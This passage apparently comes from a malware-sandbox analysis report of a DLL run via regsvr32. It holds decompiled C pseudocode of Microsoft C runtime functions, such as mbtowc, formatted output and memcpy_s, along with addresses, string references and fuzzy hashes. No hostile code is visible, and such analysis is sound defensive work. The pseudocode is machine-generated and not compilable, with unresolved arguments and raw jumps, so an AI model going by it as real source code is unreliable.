                                                                                                                                            				intOrPtr _v40;
                                                                                                                                            				intOrPtr _v44;
                                                                                                                                            				intOrPtr _v48;
                                                                                                                                            				intOrPtr _v52;
                                                                                                                                            				intOrPtr _v56;
                                                                                                                                            				char _v88;
                                                                                                                                            				intOrPtr _v96;
                                                                                                                                            				long long _v104;
                                                                                                                                            				void* _t80;
                                                                                                                                            				void* _t81;
                                                                                                                                            				void* _t89;
                                                                                                                                            				void* _t92;
                                                                                                                                            				intOrPtr _t102;
                                                                                                                                            				intOrPtr* _t136;
                                                                                                                                            				intOrPtr* _t137;
                                                                                                                                            				intOrPtr* _t139;
                                                                                                                                            				signed char* _t141;
                                                                                                                                            				intOrPtr* _t142;
                                                                                                                                            				intOrPtr* _t143;
                                                                                                                                            				intOrPtr* _t144;
                                                                                                                                            				intOrPtr* _t148;
                                                                                                                                            				intOrPtr* _t149;
                                                                                                                                            
                                                                                                                                            				_a32 = __r9;
                                                                                                                                            				_a24 = __r8;
                                                                                                                                            				_a16 = __rdx;
                                                                                                                                            				_a8 = __rcx;
                                                                                                                                            				if (_a16 == 0) goto 0x65d0f031;
                                                                                                                                            				if (_a24 != 0) goto 0x65d0f038;
                                                                                                                                            				goto 0x65d0f31a;
                                                                                                                                            				_t136 = _a16;
                                                                                                                                            				if ( *_t136 != 0) goto 0x65d0f066;
                                                                                                                                            				if (_a8 == 0) goto 0x65d0f05f;
                                                                                                                                            				 *_a8 = 0;
                                                                                                                                            				goto 0x65d0f31a;
                                                                                                                                            				0x65cf66b0();
                                                                                                                                            				_t80 = E00007FFC7FFC65CF6840(0,  &_v88);
                                                                                                                                            				_t137 =  *_t136;
                                                                                                                                            				if ( *((intOrPtr*)(_t137 + 0x10c)) == 1) goto 0x65d0f0d2;
                                                                                                                                            				_t81 = E00007FFC7FFC65CF6840(_t80,  &_v88);
                                                                                                                                            				if ( *((intOrPtr*)( *_t137 + 0x10c)) == 2) goto 0x65d0f0d2;
                                                                                                                                            				_t139 = L"_loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2";
                                                                                                                                            				_v104 = _t139;
                                                                                                                                            				r9d = 0;
                                                                                                                                            				r8d = 0x47;
                                                                                                                                            				0x65cfb3b0();
                                                                                                                                            				if (_t81 != 1) goto 0x65d0f0d2;
                                                                                                                                            				asm("int3");
                                                                                                                                            				E00007FFC7FFC65CF6840(0,  &_v88);
                                                                                                                                            				if ( *((intOrPtr*)( *_t139 + 0x14)) != 0) goto 0x65d0f121;
                                                                                                                                            				if (_a8 == 0) goto 0x65d0f106;
                                                                                                                                            				_t141 = _a16;
                                                                                                                                            				 *_a8 =  *_t141 & 0x000000ff;
                                                                                                                                            				_v56 = 1;
                                                                                                                                            				E00007FFC7FFC65CF6800( &_v88);
                                                                                                                                            				goto 0x65d0f31a;
                                                                                                                                            				E00007FFC7FFC65CF6840(_v56,  &_v88);
                                                                                                                                            				if (E00007FFC7FFC65D02B90( *_a16 & 0x000000ff, _t141, _t141) == 0) goto 0x65d0f276;
                                                                                                                                            				_t89 = E00007FFC7FFC65CF6840(_t88,  &_v88);
                                                                                                                                            				_t142 =  *_t141;
                                                                                                                                            				if ( *((intOrPtr*)(_t142 + 0x10c)) - 1 <= 0) goto 0x65d0f1f3;
                                                                                                                                            				E00007FFC7FFC65CF6840(_t89,  &_v88);
                                                                                                                                            				_t143 =  *_t142;
                                                                                                                                            				if (_a24 -  *((intOrPtr*)(_t143 + 0x10c)) < 0) goto 0x65d0f1f3;
                                                                                                                                            				if (_a8 == 0) goto 0x65d0f191;
                                                                                                                                            				_v36 = 1;
                                                                                                                                            				goto 0x65d0f199;
                                                                                                                                            				_v36 = 0;
                                                                                                                                            				_t92 = E00007FFC7FFC65CF6840( *((intOrPtr*)(_t143 + 0x10c)),  &_v88);
                                                                                                                                            				_t144 =  *_t143;
                                                                                                                                            				_v32 = _t144;
                                                                                                                                            				E00007FFC7FFC65CF6840(_t92,  &_v88);
                                                                                                                                            				_v96 = _v36;
                                                                                                                                            				_v104 = _a8;
                                                                                                                                            				r9d =  *((intOrPtr*)(_v32 + 0x10c));
                                                                                                                                            				if (MultiByteToWideChar(??, ??, ??, ??, ??, ??) != 0) goto 0x65d0f247;
                                                                                                                                            				E00007FFC7FFC65CF6840(_t94,  &_v88);
                                                                                                                                            				if (_a24 -  *((intOrPtr*)( *((intOrPtr*)( *_t144)) + 0x10c)) < 0) goto 0x65d0f221;
                                                                                                                                            				_t148 = _a16;
                                                                                                                                            				if ( *((char*)(_t148 + 1)) != 0) goto 0x65d0f247;
                                                                                                                                            				0x65cfab30();
                                                                                                                                            				 *_t148 = 0x2a;
                                                                                                                                            				_v52 = 0xffffffff;
                                                                                                                                            				E00007FFC7FFC65CF6800( &_v88);
                                                                                                                                            				goto 0x65d0f31a;
                                                                                                                                            				E00007FFC7FFC65CF6840(_v52,  &_v88);
                                                                                                                                            				_t149 =  *_t148;
                                                                                                                                            				_v48 =  *((intOrPtr*)(_t149 + 0x10c));
                                                                                                                                            				E00007FFC7FFC65CF6800( &_v88);
                                                                                                                                            				_t102 = _v48;
                                                                                                                                            				goto 0x65d0f310;
                                                                                                                                            				if (_a8 == 0) goto 0x65d0f28b;
                                                                                                                                            				_v24 = 1;
                                                                                                                                            				goto 0x65d0f293;
                                                                                                                                            				_v24 = 0;
                                                                                                                                            				E00007FFC7FFC65CF6840(_t102,  &_v88);
                                                                                                                                            				_v96 = _v24;
                                                                                                                                            				_v104 = _a8;
                                                                                                                                            				r9d = 1;
                                                                                                                                            				if (MultiByteToWideChar(??, ??, ??, ??, ??, ??) != 0) goto 0x65d0f2f8;
                                                                                                                                            				0x65cfab30();
                                                                                                                                            				 *((intOrPtr*)( *_t149)) = 0x2a;
                                                                                                                                            				_v44 = 0xffffffff;
                                                                                                                                            				E00007FFC7FFC65CF6800( &_v88);
                                                                                                                                            				goto 0x65d0f31a;
                                                                                                                                            				_v40 = 1;
                                                                                                                                            				E00007FFC7FFC65CF6800( &_v88);
                                                                                                                                            				goto 0x65d0f31a;
                                                                                                                                            				return E00007FFC7FFC65CF6800( &_v88);
                                                                                                                                            			}




























                                                                                                                                            0x7ffc65d0f000
                                                                                                                                            0x7ffc65d0f005
                                                                                                                                            0x7ffc65d0f00a
                                                                                                                                            0x7ffc65d0f00f
                                                                                                                                            0x7ffc65d0f024
                                                                                                                                            0x7ffc65d0f02f
                                                                                                                                            0x7ffc65d0f033
                                                                                                                                            0x7ffc65d0f038
                                                                                                                                            0x7ffc65d0f045
                                                                                                                                            0x7ffc65d0f050
                                                                                                                                            0x7ffc65d0f05c
                                                                                                                                            0x7ffc65d0f061
                                                                                                                                            0x7ffc65d0f073
                                                                                                                                            0x7ffc65d0f07d
                                                                                                                                            0x7ffc65d0f082
                                                                                                                                            0x7ffc65d0f08c
                                                                                                                                            0x7ffc65d0f093
                                                                                                                                            0x7ffc65d0f0a2
                                                                                                                                            0x7ffc65d0f0a4
                                                                                                                                            0x7ffc65d0f0ab
                                                                                                                                            0x7ffc65d0f0b0
                                                                                                                                            0x7ffc65d0f0b3
                                                                                                                                            0x7ffc65d0f0c5
                                                                                                                                            0x7ffc65d0f0cd
                                                                                                                                            0x7ffc65d0f0cf
                                                                                                                                            0x7ffc65d0f0d7
                                                                                                                                            0x7ffc65d0f0e3
                                                                                                                                            0x7ffc65d0f0ee
                                                                                                                                            0x7ffc65d0f0f0
                                                                                                                                            0x7ffc65d0f103
                                                                                                                                            0x7ffc65d0f106
                                                                                                                                            0x7ffc65d0f113
                                                                                                                                            0x7ffc65d0f11c
                                                                                                                                            0x7ffc65d0f126
                                                                                                                                            0x7ffc65d0f140
                                                                                                                                            0x7ffc65d0f14b
                                                                                                                                            0x7ffc65d0f150
                                                                                                                                            0x7ffc65d0f15a
                                                                                                                                            0x7ffc65d0f165
                                                                                                                                            0x7ffc65d0f16a
                                                                                                                                            0x7ffc65d0f17a
                                                                                                                                            0x7ffc65d0f185
                                                                                                                                            0x7ffc65d0f187
                                                                                                                                            0x7ffc65d0f18f
                                                                                                                                            0x7ffc65d0f191
                                                                                                                                            0x7ffc65d0f19e
                                                                                                                                            0x7ffc65d0f1a3
                                                                                                                                            0x7ffc65d0f1a6
                                                                                                                                            0x7ffc65d0f1b0
                                                                                                                                            0x7ffc65d0f1bc
                                                                                                                                            0x7ffc65d0f1c8
                                                                                                                                            0x7ffc65d0f1d2
                                                                                                                                            0x7ffc65d0f1f1
                                                                                                                                            0x7ffc65d0f1f8
                                                                                                                                            0x7ffc65d0f20f
                                                                                                                                            0x7ffc65d0f211
                                                                                                                                            0x7ffc65d0f21f
                                                                                                                                            0x7ffc65d0f221
                                                                                                                                            0x7ffc65d0f226
                                                                                                                                            0x7ffc65d0f22c
                                                                                                                                            0x7ffc65d0f239
                                                                                                                                            0x7ffc65d0f242
                                                                                                                                            0x7ffc65d0f24c
                                                                                                                                            0x7ffc65d0f251
                                                                                                                                            0x7ffc65d0f25a
                                                                                                                                            0x7ffc65d0f263
                                                                                                                                            0x7ffc65d0f268
                                                                                                                                            0x7ffc65d0f271
                                                                                                                                            0x7ffc65d0f27f
                                                                                                                                            0x7ffc65d0f281
                                                                                                                                            0x7ffc65d0f289
                                                                                                                                            0x7ffc65d0f28b
                                                                                                                                            0x7ffc65d0f298
                                                                                                                                            0x7ffc65d0f2a4
                                                                                                                                            0x7ffc65d0f2b0
                                                                                                                                            0x7ffc65d0f2b5
                                                                                                                                            0x7ffc65d0f2d3
                                                                                                                                            0x7ffc65d0f2d5
                                                                                                                                            0x7ffc65d0f2da
                                                                                                                                            0x7ffc65d0f2e0
                                                                                                                                            0x7ffc65d0f2ed
                                                                                                                                            0x7ffc65d0f2f6
                                                                                                                                            0x7ffc65d0f2f8
                                                                                                                                            0x7ffc65d0f305
                                                                                                                                            0x7ffc65d0f30e
                                                                                                                                            0x7ffc65d0f321

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            • f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbtowc.c, xrefs: 00007FFC65D0F0B9
                                                                                                                                            • _loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2, xrefs: 00007FFC65D0F0A4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Locale$UpdateUpdate::~_$ByteCharMultiWide
                                                                                                                                            • String ID: _loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbtowc.c
                                                                                                                                            • API String ID: 3162172745-1617866167
                                                                                                                                            • Opcode ID: 1f8ba6bd668c859fdc1c929c81f91c7de023d0dcacf149bd6155c41000b32a69
                                                                                                                                            • Instruction ID: de3e96a4ff20154b0670faf1af3aba8427339ef361faca04d7715765e39d34a9
                                                                                                                                            • Opcode Fuzzy Hash: 1f8ba6bd668c859fdc1c929c81f91c7de023d0dcacf149bd6155c41000b32a69
                                                                                                                                            • Instruction Fuzzy Hash: 7A913832A1CA9AD6E764DF20E4403AAB7A0FB85B44F608535E68D837D5DF7DD484CB10
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Locale$UpdateUpdate::~_$_invoke_watson_if_oneof_swprintf_p
                                                                                                                                            • String ID: $ Data: <%s> %s$%.2X $(*_errno())$_printMemBlockData$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c
                                                                                                                                            • API String ID: 792801276-1329727594
                                                                                                                                            • Opcode ID: 3bedb609291a4b858326ef236c1a71752733cc22d3f81b148e8b3570f3bc9f75
                                                                                                                                            • Instruction ID: 08e821fc56abff65e9b68816ce24086410dc45c2ac1f1f30a9aba02b5113943b
                                                                                                                                            • Opcode Fuzzy Hash: 3bedb609291a4b858326ef236c1a71752733cc22d3f81b148e8b3570f3bc9f75
                                                                                                                                            • Instruction Fuzzy Hash: 85611632A0DAD9D6E7349B11E4503AAB7A0FB89B44F60453AD6CD47B89DF3ED444CB20
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __doserrno$_invalid_parameter
                                                                                                                                            • String ID: (_osfile(fh) & FOPEN)$(fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_get_osfhandle$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\osfinfo.c
                                                                                                                                            • API String ID: 747159061-3177431134
                                                                                                                                            • Opcode ID: a294e87af6799fd5b40bd152d4ba1c080b88c0b0971c2ee76bd3c9e1fffa8bcc
                                                                                                                                            • Instruction ID: 3a0bfa5857907ca7a65e4e756df5d5fd41db1aef8c6626bb42532f401fac4eb1
                                                                                                                                            • Opcode Fuzzy Hash: a294e87af6799fd5b40bd152d4ba1c080b88c0b0971c2ee76bd3c9e1fffa8bcc
                                                                                                                                            • Instruction Fuzzy Hash: 94519D32A1C66ADAEB248F10E58036AB3A1FB84B64F705B31E16D076D5DFBCD400CB20
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Heap$AllocH_enabledSize_invalid_parameter_is_
                                                                                                                                            • String ID: _expand_base$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\expand.c$pBlock != NULL
                                                                                                                                            • API String ID: 1608253119-1427866139
                                                                                                                                            • Opcode ID: b3a6b944d23a3465c4e6046a1e88bc32cc41bb9fe3a320684877be901aeb32e4
                                                                                                                                            • Instruction ID: a8adcc877463e49737f29fb96108bf29f2d3bac7d308ee190e97759ff64cd87d
                                                                                                                                            • Opcode Fuzzy Hash: b3a6b944d23a3465c4e6046a1e88bc32cc41bb9fe3a320684877be901aeb32e4
                                                                                                                                            • Instruction Fuzzy Hash: 04414D7291CB5AD2E7209F10E54436A73A0FF88B48F604935E68D42AD8CF7EE484CB60
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter
                                                                                                                                            • String ID: ("Buffer too small", 0)$_vsnwprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vswprint.c$format != NULL$string != NULL && sizeInWords > 0
                                                                                                                                            • API String ID: 2123368286-2958264153
                                                                                                                                            • Opcode ID: ced4706838129b7b95ee409a728acbeff35cdf169ec97d38e23daf610fb20cc8
                                                                                                                                            • Instruction ID: bb1728f97e88e464a59e7f61dcfd27cdeeb55483dfe15825a3883250385a3eca
                                                                                                                                            • Opcode Fuzzy Hash: ced4706838129b7b95ee409a728acbeff35cdf169ec97d38e23daf610fb20cc8
                                                                                                                                            • Instruction Fuzzy Hash: 64E15D3290CA9AC6EB749F24E54036AB3A0FB85B64F200A35E69D43BD9DF3CD445CB11
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: get_int64_arg
                                                                                                                                            • String ID: ("Incorrect format specifier", 0)$-$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                                                                            • API String ID: 1967237116-569934968
                                                                                                                                            • Opcode ID: a4b0ff099cb4cab39938a39410f3255722065ce2ff61adb6fbb12e1a083add00
                                                                                                                                            • Instruction ID: 5107d381014018fb39cc774164a016c32bddd0dc3f06a7037870875710ec4f46
                                                                                                                                            • Opcode Fuzzy Hash: a4b0ff099cb4cab39938a39410f3255722065ce2ff61adb6fbb12e1a083add00
                                                                                                                                            • Instruction Fuzzy Hash: 30D1057250CADACAE775CF15E5503AAB7A4E784B54F200535EA8C86AE8DF7CE540CF20
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                            			E00007FFC7FFC65D0BFDE(char _a696, char _a976) {
                                                                                                                                            
                                                                                                                                            				_a976 = _a696;
                                                                                                                                            				_a976 = _a976 - 0x41;
                                                                                                                                            				if (_a976 - 0x37 > 0) goto 0x65d0ca31;
                                                                                                                                            				goto __rax;
                                                                                                                                            			}



                                                                                                                                            0x7ffc65d0bfe6
                                                                                                                                            0x7ffc65d0bff7
                                                                                                                                            0x7ffc65d0c006
                                                                                                                                            0x7ffc65d0c02d

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: wctomb_s
                                                                                                                                            • String ID: $("Incorrect format specifier", 0)$7$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                                                                            • API String ID: 2215178078-1895985292
                                                                                                                                            • Opcode ID: cbe9265cfe95002cd01c633456f4143dcea286b255341fa392fef384a43988b7
                                                                                                                                            • Instruction ID: 3bc875b7ed39e01d45ac04a764842daf23e6e890284c5e7a85992b93d8d526f0
                                                                                                                                            • Opcode Fuzzy Hash: cbe9265cfe95002cd01c633456f4143dcea286b255341fa392fef384a43988b7
                                                                                                                                            • Instruction Fuzzy Hash: BAB1267250C6DACAE775CF14E5453AAB7A4FB84B54F200436E68C86AE9DB7CE540CF20
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter
                                                                                                                                            • String ID: ("Buffer too small", 0)$_vsprintf_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\vsprintf.c$format != NULL$string != NULL && sizeInBytes > 0
                                                                                                                                            • API String ID: 2123368286-348877268
                                                                                                                                            • Opcode ID: 2cfb79548520c5644ac56b859ec2257f97161b74a067da09cc3df7a1a7a1eb8b
                                                                                                                                            • Instruction ID: 2e44e61ede3009d26cc0296ef1688ad6901e19c67babfe1cbe7a6ba506a98030
                                                                                                                                            • Opcode Fuzzy Hash: 2cfb79548520c5644ac56b859ec2257f97161b74a067da09cc3df7a1a7a1eb8b
                                                                                                                                            • Instruction Fuzzy Hash: 86915E3290DA5AC6E7648F64E94436AB7A0FB84B58F301A35E69D43BE8DF7CD444CB10
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                                                                                                            • String ID: ("Incorrect format specifier", 0)$(ch != _T('\0'))$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                                                                                                            • API String ID: 2192614184-4087627024
                                                                                                                                            • Opcode ID: 129faf18f11d0aee11f016f36c84ee6a14c26cc1d7ed9976eab63fbc1969d985
                                                                                                                                            • Instruction ID: e1e912f5cc5badb29eb05698b37f54ceb456bd20ea542b2b551ed7e9bb1cff08
                                                                                                                                            • Opcode Fuzzy Hash: 129faf18f11d0aee11f016f36c84ee6a14c26cc1d7ed9976eab63fbc1969d985
                                                                                                                                            • Instruction Fuzzy Hash: 1C715D6290C6EAD6E7B4DF20E5543BEB7A4EB84B44F600935D68D826E9DF3CD144CB20
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter
                                                                                                                                            • String ID: dst != NULL$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\memcpy_s.c$memcpy_s$sizeInBytes >= count$src != NULL
                                                                                                                                            • API String ID: 2123368286-3692278645
                                                                                                                                            • Opcode ID: 55675c40df69ab8a15ad1ce5aa383a74447e024eaeb1f72783c964e483dda9b8
                                                                                                                                            • Instruction ID: 90d73a061e8dadb82b7e9a7599cfffe249075c4d39a7fb1b32b858485cfa19eb
                                                                                                                                            • Opcode Fuzzy Hash: 55675c40df69ab8a15ad1ce5aa383a74447e024eaeb1f72783c964e483dda9b8
                                                                                                                                            • Instruction Fuzzy Hash: 2C51A43290C66AC6F7248F90E94436A77A1FB84B48F705935E68D43AD8CF7DE444CB21
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323699379.00007FFC65CF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFC65CF0000, based on PE: true
                                                                                                                                            • Associated: 00000010.00000002.323681569.00007FFC65CF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323759845.00007FFC65D12000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323794895.00007FFC65D1B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000010.00000002.323808802.00007FFC65D1F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_7ffc65cf0000_regsvr32.jbxd
